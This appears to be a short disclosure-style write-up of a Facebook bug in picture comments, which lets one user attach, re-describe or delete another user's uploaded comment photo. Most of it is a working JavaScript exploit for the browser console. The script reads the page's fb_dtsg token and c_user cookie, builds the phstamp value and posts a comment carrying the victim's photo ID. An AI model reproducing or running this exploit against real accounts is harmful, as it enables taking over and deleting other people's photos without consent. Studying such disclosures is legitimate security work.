Today Facebook rollouts for FB users to comment with picture on any status.
But the feature has a bug which allows malicious user to hijack
the picture from any comments if the picture is share by uploading for comment.
After Malicious user hijack the picture, malicious person can
change picture description as well as delete the picture.
Let's get started! all you need are status ID and
victim's uploaded picture for comment ID.
Once you have both, we can simply comment on any status
with that uploaded picture iD with the help of little javascript or
you can use tampa data (attached_photo_fbid) to post with comment picture ID.
Let's see action on Failbook :)
var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack
function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = '';
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt(c)
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=')[1].split(';')[0],
h = "ft_ent_identifier="+statuslinkID+"&comment_text="+yourMessage +"&source=1&client_id=1371674471412:1000847939&attached_photo_fbid="+photofbID+"&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + c + "&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=" + e;
m = generatePhstamp(h, e);
h += "&phstamp=" + m;
picture = new XMLHttpRequest();
picture.open("POST", "https://www.facebook.com/ajax/ufi/add_comment.php", true);
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted athttp://facebook.com/"+statuslinkID);
